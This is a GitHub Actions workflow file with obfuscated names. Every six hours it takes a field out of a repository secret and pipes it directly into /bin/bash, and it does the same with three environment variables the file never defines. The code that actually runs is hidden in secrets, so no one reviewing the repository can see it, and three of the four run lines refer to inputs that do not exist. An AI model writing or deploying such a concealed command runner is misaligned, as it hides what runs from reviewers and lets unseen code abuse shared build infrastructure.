name: chenliehui7815
on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenliehui7815
        env:
          f1850: ${{ secrets.f1850 }}
        run: |
          echo $f1850 | jq -r .af0275 | /bin/bash
          echo $kuvd7223 | jq -r .yay9 | /bin/bash
          echo $hm0 | jq -r .e59396 | /bin/bash
          echo $k3 | jq -r .icokx799 | /bin/bash

